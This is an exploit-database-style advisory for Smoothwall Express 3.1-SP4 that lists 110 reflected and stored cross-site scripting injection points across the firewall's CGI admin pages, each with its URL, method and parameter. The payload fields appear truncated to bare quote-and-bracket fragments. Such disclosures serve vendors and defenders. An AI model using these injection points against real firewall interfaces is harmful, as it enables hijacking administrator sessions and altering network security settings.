##################################################################################################################################
# Exploit Title: Smoothwall Express 3.1-SP4-polar-x86_64-update9 |
Cross-Site Scripting
# Date: 06.02.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: http://www.smoothwall.org
# Software Link:
https://sourceforge.net/projects/smoothwall/files/SmoothWall/3.1%20SP4/Express-3.1-SP4-x86_64.iso/download
# Version: 3.1-SP4-polar-x86_64-update9
##################################################################################################################################
Introduction
The Smoothwall Open Source Project was set up in 2000 to develop and
maintain Smoothwall Express - a Free firewall that includes its own
security-hardened GNU/Linux operating system and an easy-to-use web
interface.
#################################################################################
XSS details: Reflected & Stored
#################################################################################
XSS1 | Stored
URL
http://192.168.2.200:81/cgi-bin/proxy.cgi?
METHOD
Post
PARAMETER
CACHE_SIZE
PAYLOAD
'>
#################################################################################
XSS2 | Stored
URL
http://192.168.2.200:81/cgi-bin/proxy.cgi?
METHOD
Post
PARAMETER
MAX_SIZE
PAYLOAD
'>
#################################################################################
XSS3 | Stored
URL
http://192.168.2.200:81/cgi-bin/proxy.cgi?
METHOD
Post
PARAMETER
MIN_SIZE
PAYLOAD
'>
#################################################################################
XSS4 | Reflected
URL
http://192.168.2.200:81/cgi-bin/proxy.cgi?
METHOD
Post
PARAMETER
MAX_OUTGOING_SIZE
PAYLOAD
'>
#################################################################################
XSS5 | Stored
URL
http://192.168.2.200:81/cgi-bin/proxy.cgi?
METHOD
Post
PARAMETER
MAX_INCOMING_SIZE
PAYLOAD
'>
#################################################################################
XSS6 | Stored
URL
http://192.168.2.200:81/cgi-bin/urlfilter.cgi
METHOD
Post
PARAMETER
REDIRECT_PAGE
PAYLOAD
'>
#################################################################################
XSS7 | Reflected
URL
http://192.168.2.200:81/cgi-bin/urlfilter.cgi
METHOD
Post
PARAMETER
CHILDREN
PAYLOAD
'>
#################################################################################
XSS8 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
BOOT_SERVER
PAYLOAD
'>
#################################################################################
XSS9 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
BOOT_FILE
PAYLOAD
'>
#################################################################################
XSS10 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
BOOT_ROOT
PAYLOAD
'>
#################################################################################
XSS11 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
START_ADDR
PAYLOAD
'>
#################################################################################
XSS12 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
END_ADDR
PAYLOAD
'>
#################################################################################
XSS13 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
DNS1
PAYLOAD
'>
#################################################################################
XSS14 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
DNS2
PAYLOAD
'>
#################################################################################
XSS15 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
NTP1
PAYLOAD
'>
#################################################################################
XSS16 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
NTP2
PAYLOAD
'>
#################################################################################
XSS17 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
WINS1
PAYLOAD
'>
#################################################################################
XSS18 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
WINS2
PAYLOAD
'>
#################################################################################
XSS19 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
DEFAULT_LEASE_TIME
PAYLOAD
'>
#################################################################################
XSS20 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
MAX_LEASE_TIME
PAYLOAD
'>
#################################################################################
XSS21 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
DOMAIN_NAME
PAYLOAD
'>
#################################################################################
XSS22 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
NIS_DOMAIN
PAYLOAD
'>
#################################################################################
XSS23 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
NIS1
PAYLOAD
'>
#################################################################################
XSS24 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
NIS2
PAYLOAD
'>
#################################################################################
XSS25 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
STATIC_HOST
PAYLOAD
'>
#################################################################################
XSS26 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
STATIC_DESC
PAYLOAD
'>
#################################################################################
XSS27 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
STATIC_MAC
PAYLOAD
'>
#################################################################################
XSS28 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?
METHOD
Post
PARAMETER
STATIC_IP
PAYLOAD
'>
#################################################################################
XSS29 | Reflected
URL
http://192.168.2.200:81/cgi-bin/ddns.cgi?
METHOD
Post
PARAMETER
HOSTNAME
PAYLOAD
'>
#################################################################################
XSS30 | Reflected
URL
http://192.168.2.200:81/cgi-bin/ddns.cgi?
METHOD
Post
PARAMETER
DOMAIN
PAYLOAD
'>
#################################################################################
XSS31 | Reflected
URL
http://192.168.2.200:81/cgi-bin/ddns.cgi?
METHOD
Post
PARAMETER
LOGIN
PAYLOAD
'">
#################################################################################
XSS32 | Reflected
URL
http://192.168.2.200:81/cgi-bin/ddns.cgi?
METHOD
Post
PARAMETER
PASSWORD
PAYLOAD
'>
#################################################################################
XSS33 | Reflected
URL
http://192.168.2.200:81/cgi-bin/ddns.cgi?
METHOD
Post
PARAMETER
COMMENT
PAYLOAD
'>
#################################################################################
XSS34 | Reflected
URL
http://192.168.2.200:81/cgi-bin/hosts.cgi?
METHOD
Post
PARAMETER
IP
PAYLOAD
'">
#################################################################################
XSS35 | Reflected
URL
http://192.168.2.200:81/cgi-bin/hosts.cgi?
METHOD
Post
PARAMETER
HOSTNAME
PAYLOAD
'>
#################################################################################
XSS36 | Reflected
URL
http://192.168.2.200:81/cgi-bin/hosts.cgi?
METHOD
Post
PARAMETER
COMMENT
PAYLOAD
'>
#################################################################################
XSS37 | Reflected
URL
http://192.168.2.200:81/cgi-bin/time.cgi?
METHOD
Post
PARAMETER
NTP_SERVER
PAYLOAD
'>
#################################################################################
XSS38 | Reflected
URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?
METHOD
Post
PARAMETER
BATTLEVEL
PAYLOAD
'>
#################################################################################
XSS39 | Reflected
URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?
METHOD
Post
PARAMETER
RTMIN
PAYLOAD
'>
#################################################################################
XSS40 | Reflected
URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?
METHOD
Post
PARAMETER
BATTDELAY
PAYLOAD
'>
#################################################################################
XSS41 | Reflected
URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?
METHOD
Post
PARAMETER
TO
PAYLOAD
'>
#################################################################################
XSS42 | Reflected
URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?
METHOD
Post
PARAMETER
ANNOY
PAYLOAD
'>
#################################################################################
XSS43 | Reflected
URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?
METHOD
Post
PARAMETER
UPSIP
PAYLOAD
'>
#################################################################################
XSS44 | Reflected
URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?
METHOD
Post
PARAMETER
UPSNAME
PAYLOAD
'>
#################################################################################
XSS45 | Reflected
URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?
METHOD
Post
PARAMETER
UPSPORT
PAYLOAD
'>
#################################################################################
XSS46 | Reflected
URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?
METHOD
Post
PARAMETER
POLLTIME
PAYLOAD
'>
#################################################################################
XSS47 | Reflected
URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?
METHOD
Post
PARAMETER
UPSUSER
PAYLOAD
'>
#################################################################################
XSS48 | Reflected
URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?
METHOD
Post
PARAMETER
NISPORT
PAYLOAD
'>
#################################################################################
XSS49 | Reflected
URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?
METHOD
Post
PARAMETER
UPSAUTH
PAYLOAD
'>
#################################################################################
XSS50 | Reflected
URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?
METHOD
Post
PARAMETER
EMAIL
PAYLOAD
'>
#################################################################################
XSS51 | Reflected
URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?
METHOD
Post
PARAMETER
FROM
PAYLOAD
'>
#################################################################################
XSS52 | Reflected
URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?
METHOD
Post
PARAMETER
CC
PAYLOAD
'>
#################################################################################
XSS53 | Reflected
URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?
METHOD
Post
PARAMETER
SMSEMAIL
PAYLOAD
'>
#################################################################################
XSS54 | Reflected
URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?
METHOD
Post
PARAMETER
SMTPSERVER
PAYLOAD
'>
#################################################################################
XSS55 | Reflected
URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?
METHOD
Post
PARAMETER
PORT
PAYLOAD
'>
#################################################################################
XSS56 | Reflected
URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?
METHOD
Post
PARAMETER
USER
PAYLOAD
'>
#################################################################################
XSS57 | Reflected
URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?
METHOD
Post
PARAMETER
EMAIL_PASSWORD
PAYLOAD
'">
#################################################################################
XSS58 | Reflected
URL
http://192.168.2.200:81/cgi-bin/portfw.cgi?
METHOD
Post
PARAMETER
EXT
PAYLOAD
'>
#################################################################################
XSS59 | Reflected
URL
http://192.168.2.200:81/cgi-bin/portfw.cgi?
METHOD
Post
PARAMETER
SRC_PORT_SEL
PAYLOAD
'>
#################################################################################
XSS60 | Reflected
URL
http://192.168.2.200:81/cgi-bin/portfw.cgi?
METHOD
Post
PARAMETER
SRC_PORT
PAYLOAD
'>
#################################################################################
XSS61 | Reflected
URL
http://192.168.2.200:81/cgi-bin/portfw.cgi?
METHOD
Post
PARAMETER
DEST_IP
PAYLOAD
'>
#################################################################################
XSS62 | Reflected
URL
http://192.168.2.200:81/cgi-bin/portfw.cgi?
METHOD
Post
PARAMETER
DEST_PORT_SEL
PAYLOAD
'>
#################################################################################
XSS63 | Reflected
URL
http://192.168.2.200:81/cgi-bin/portfw.cgi?
METHOD
Post
PARAMETER
COMMENT
PAYLOAD
'>
#################################################################################
XSS64 | Reflected
URL
http://192.168.2.200:81/cgi-bin/outgoing.cgi?
METHOD
Post
PARAMETER
MACHINE
PAYLOAD
'>
#################################################################################
XSS65 | Reflected
URL
http://192.168.2.200:81/cgi-bin/outgoing.cgi?
METHOD
Post
PARAMETER
MACHINECOMMENT
PAYLOAD
'>
#################################################################################
XSS66 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dmzholes.cgi?
METHOD
Post
PARAMETER
SRC_IP
PAYLOAD
'>
#################################################################################
XSS67 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dmzholes.cgi?
METHOD
Post
PARAMETER
DEST_IP
PAYLOAD
'>
#################################################################################
XSS68 | Reflected
URL
http://192.168.2.200:81/cgi-bin/dmzholes.cgi?
METHOD
Post
PARAMETER
COMMENT
PAYLOAD
'>
#################################################################################
XSS69 | Reflected
URL
http://192.168.2.200:81/cgi-bin/xtaccess.cgi?
METHOD
Post
PARAMETER
EXT
PAYLOAD
'>
#################################################################################
XSS70 | Reflected
URL
http://192.168.2.200:81/cgi-bin/xtaccess.cgi?
METHOD
Post
PARAMETER
DEST_PORT
PAYLOAD
'>
#################################################################################
XSS71 | Reflected
URL
http://192.168.2.200:81/cgi-bin/xtaccess.cgi?
METHOD
Post
PARAMETER
COMMENT
PAYLOAD
'>
#################################################################################
XSS72 | Reflected
URL
http://192.168.2.200:81/cgi-bin/ipblock.cgi?
METHOD
Post
PARAMETER
SRC_IP
PAYLOAD
'>
#################################################################################
XSS73 | Reflected
URL
http://192.168.2.200:81/cgi-bin/ipblock.cgi?
METHOD
Post
PARAMETER
COMMENT
PAYLOAD
'>
#################################################################################
XSS74 | Reflected
URL
http://192.168.2.200:81/cgi-bin/timedaccess.cgi?
METHOD
Post
PARAMETER
MACHINES
PAYLOAD
'>
#################################################################################
XSS75 | Reflected
URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?
METHOD
Post
PARAMETER
GREEN_ADDRESS
PAYLOAD
'>
#################################################################################
XSS76 | Reflected
URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?
METHOD
Post
PARAMETER
GREEN_NETMASK
PAYLOAD
'>
#################################################################################
XSS77 | Reflected
URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?
METHOD
Post
PARAMETER
RED_DHCP_HOSTNAME
PAYLOAD
'>
#################################################################################
XSS78 | Reflected
URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?
METHOD
Post
PARAMETER
RED_ADDRESS
PAYLOAD
'>
#################################################################################
XSS79 | Reflected
URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?
METHOD
Post
PARAMETER
DNS1_OVERRIDE
PAYLOAD
'>
#################################################################################
XSS80 | Reflected
URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?
METHOD
Post
PARAMETER
DNS2_OVERRIDE
PAYLOAD
'>
#################################################################################
XSS81 | Reflected
URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?
METHOD
Post
PARAMETER
RED_MAC
PAYLOAD
'>
#################################################################################
XSS82 | Reflected
URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?
METHOD
Post
PARAMETER
RED_NETMASK
PAYLOAD
'>
#################################################################################
XSS83 | Reflected
URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?
METHOD
Post
PARAMETER
DEFAULT_GATEWAY
PAYLOAD
'>
#################################################################################
XSS84 | Reflected
URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?
METHOD
Post
PARAMETER
DNS1
PAYLOAD
'>
#################################################################################
XSS85 | Reflected
URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?
METHOD
Post
PARAMETER
DNS2
PAYLOAD
'>
#################################################################################
XSS86 | Reflected
URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?
METHOD
Post
PARAMETER
NAME
PAYLOAD
'>
#################################################################################
XSS87 | Reflected
URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?
METHOD
Post
PARAMETER
LEFT
PAYLOAD
'>
#################################################################################
XSS88 | Reflected
URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?
METHOD
Post
PARAMETER
LEFT_SUBNET
PAYLOAD
'>
#################################################################################
XSS89 | Reflected
URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?
METHOD
Post
PARAMETER
RIGHT
PAYLOAD
'>
#################################################################################
XSS90 | Reflected
URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?
METHOD
Post
PARAMETER
RIGHT_SUBNET
PAYLOAD
'>
#################################################################################
XSS91 | Reflected
URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?
METHOD
Post
PARAMETER
SECRET1
PAYLOAD
'>
#################################################################################
XSS92 | Reflected
URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?
METHOD
Post
PARAMETER
SECRET2
PAYLOAD
'>
#################################################################################
XSS93 | Reflected
URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?
METHOD
Post
PARAMETER
COMMENT
PAYLOAD
'>
#################################################################################
XSS94 | Stored
URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?
METHOD
Post
PARAMETER
filename
PAYLOAD
#################################################################################
XSS95 | Reflected
URL
http://192.168.2.200:81/cgi-bin/logs.cgi/proxylog.dat
METHOD
Post
PARAMETER
SOURCE_IP
PAYLOAD
">
#################################################################################
XSS96 | Stored
URL
http://192.168.2.200:81/cgi-bin/logs.cgi/proxylog.dat
METHOD
Post
PARAMETER
FILTER
PAYLOAD
'>
#################################################################################
XSS97 | Reflected
URL
http://192.168.2.200:81/cgi-bin/ipinfo.cgi?
METHOD
Post
PARAMETER
IP
PAYLOAD
'>
#################################################################################
XSS98 | Reflected
URL
http://192.168.2.200:81/cgi-bin/iptools.cgi?
METHOD
Post
PARAMETER
IP
PAYLOAD
'>
#################################################################################
XSS99 | Reflected
URL
http://192.168.2.200:81/cgi-bin/smoothinfo.cgi?
METHOD
Post
PARAMETER
WRAP
PAYLOAD
'>
#################################################################################
XSS100 | Reflected
URL
http://192.168.2.200:81/cgi-bin/smoothinfo.cgi?
METHOD
Post
PARAMETER
SECTIONTITLE
PAYLOAD
'>
#################################################################################
XSS101 | Stored
URL
http://192.168.2.200:81/cgi-bin/modem.cgi?
METHOD
Post
PARAMETER
INIT
PAYLOAD
'>
#################################################################################
XSS102 | Stored
URL
http://192.168.2.200:81/cgi-bin/modem.cgi?
METHOD
Post
PARAMETER
HANGUP
PAYLOAD
'>
#################################################################################
XSS103 | Stored
URL
http://192.168.2.200:81/cgi-bin/modem.cgi?
METHOD
Post
PARAMETER
SPEAKER_ON
PAYLOAD
'>
#################################################################################
XSS104 | Stored
URL
http://192.168.2.200:81/cgi-bin/modem.cgi?
METHOD
Post
PARAMETER
SPEAKER_OFF
PAYLOAD
'>
#################################################################################
XSS105 | Stored
URL
http://192.168.2.200:81/cgi-bin/modem.cgi?
METHOD
Post
PARAMETER
TONE_DIAL
PAYLOAD
'>
#################################################################################
XSS106 | Stored
URL
http://192.168.2.200:81/cgi-bin/modem.cgi?
METHOD
Post
PARAMETER
PULSE_DIAL
PAYLOAD
'>
#################################################################################
XSS107 | Reflected
URL
http://192.168.2.200:81/cgi-bin/modem.cgi?
METHOD
Post
PARAMETER
TIMEOUT
PAYLOAD
'>
#################################################################################
XSS108 | Stored
URL
http://192.168.2.200:81/cgi-bin/preferences.cgi?
METHOD
Post
PARAMETER
HOSTNAME
PAYLOAD
'>
#################################################################################
XSS109 | Stored
URL
http://192.168.2.200:81/cgi-bin/preferences.cgi?
METHOD
Post
PARAMETER
KEYMAP
PAYLOAD
'>
#################################################################################
XSS110 | Stored
URL
http://192.168.2.200:81/cgi-bin/preferences.cgi?
METHOD
Post
PARAMETER
OPENNESS
PAYLOAD
'>
#################################################################################